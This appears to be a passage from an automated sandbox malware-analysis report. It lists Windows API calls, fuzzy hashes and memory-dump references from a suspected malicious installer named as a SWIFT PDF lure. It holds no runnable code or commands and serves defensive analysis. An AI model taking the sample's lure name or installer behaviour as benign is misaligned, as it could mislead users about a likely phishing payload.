                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3449924974-0
                                                                                                                                • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                                • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9
                                                                                                                                APIs
                                                                                                                                • DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                                • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                                APIs
                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                                  • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                                • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                                • GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                • String ID: nsa
                                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                                • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                                • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                                                                                                                APIs
                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                Strings
                                                                                                                                • Error launching installer, xrefs: 00405748
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                • String ID: Error launching installer
                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                                • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                                APIs
                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                                • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 190613189-0
                                                                                                                                • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                                • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9